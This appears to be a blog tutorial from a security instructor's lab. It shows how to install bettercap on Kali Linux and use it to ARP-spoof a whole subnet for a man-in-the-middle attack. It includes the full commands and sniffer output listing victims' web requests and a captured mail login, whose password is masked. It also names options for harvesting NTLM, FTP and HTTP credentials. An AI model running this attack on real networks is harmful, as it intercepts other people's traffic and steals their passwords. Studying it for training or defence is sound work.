MiTM using Bettercap


Hello readers. I’ve been writing some courses to next year (Hacking 1, 2 and 3, among other courses) and, during a section about MiTM, I found the same usual tools such as Cain and Abel, Ethercap, and so on. Therefore, I’ve decided to change the context and take an easier way to perform the MiTM attack by using a new tool named “bettercap” (http://www.bettercap.org/). In my lab, bettercap ARP has spoofed all devices in the network (three computer and two phones) and I could make a big MiTM for all them. 🙂

To use bettercap on Kali Linux we have to execute the following commands:

root@hacker2:~# git clone https://github.com/evilsocket/bettercap

root@hacker2:~# apt-get install ruby-dev libpcap-dev

root@hacker2:~# cd bettercap/

root@hacker2:~# gem clean bettercap.gemspec

root@hacker2:~# gem build bettercap.gemspec

root@hacker2:~# gem install bettercap*.gem

root@hacker2:~# bettercap -X -L -I eth0

[I] Targeting the whole subnet 192.168.1.0..192.168.1.255 …

[I] Network discovery thread started.

[I] Searching for alive targets …

[I] Getting gateway 192.168.1.1 MAC address …

WARNING: pinging broadcast address

[I] Gateway : 192.168.1.1 ( cc:b2:55:d0:16:54 )

[I] Local : 192.168.1.108 ( 00:0c:29:9e:dc:48 )

[I] Starting ARP spoofer …

[I] Starting sniffer …

[I] Collected 2 total targets.

[I] 192.168.1.100 : 48:5b:39:6c:29:7c ( Asustek Computer )

[I] 192.168.1.103 : 60:36:dd:03:ff:e3 ( Intel Corporate )

[W] Aquired 2 new targets.

[192.168.1.100:55867 > 199.16.158.8:443 TCP] [HTTPS] https://199.16.158.8/

[192.168.1.100:55986 > 208.84.244.144:80 TCP] [GET] http://mail.terra.com.br/globalSTATIC/fe/zaz-admanager/zaz-admanager.html

[192.168.1.100:55988 > 85.31.217.162:80 TCP] [GET] http://p.nxtck.com/an?a=2&cb=0.4494611646514386

[192.168.1.100:55988 > 85.31.217.162:80 TCP] [GET] http://p.nxtck.com/an?a=2&cb=0.4494611646514386

[192.168.1.103:9069 > 177.153.30.100:443 TCP] [HTTPS] https://177.153.30.100/

[192.168.1.103:9069 > 177.153.30.100:443 TCP] [HTTPS] https://177.153.30.100/

[192.168.1.103:9147 > 213.180.193.119:443 TCP] [HTTPS] https://mc.yandex.ru/    # SUSPECT CONNECTION

[192.168.1.103:9147 > 213.180.193.119:443 TCP] [HTTPS] https://mc.yandex.ru/        # SUSPECT CONNECTION

[186.202.140.222:110 > 192.168.1.101:32973 TCP] [FTP] +OK

CAPA

TOP

UIDL

RESP-CODES

PIPELINING

STLS

USER

SASL PLAIN LOGIN

.

[192.168.1.101:32973 > 186.202.140.222:110 TCP] [FTP] USER alex_sun@xxx.xxx

[192.168.1.101:32973 > 186.202.140.222:110 TCP] [FTP] USER alex_sun@xxx.xxx

[192.168.1.101:32973 > 186.202.140.222:110 TCP] [FTP] PASS XXXXX    # E-MAIL PASSWORD REVEALED

[192.168.1.101:32973 > 186.202.140.222:110 TCP] [FTP] PASS XXXXX    # # E-MAIL PASSWORD REVEALED

……..

You should also test the –P (to narrow the parses – NTLMSS, MAIL, FTP, HTTPAUTH, and so on) and –proxy option. 🙂

Have a nice day and thanks for your attention.

Alexandre Borges

(Linkedin: http://www.linkedin.com/in/aleborges)

Leave a Comment

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s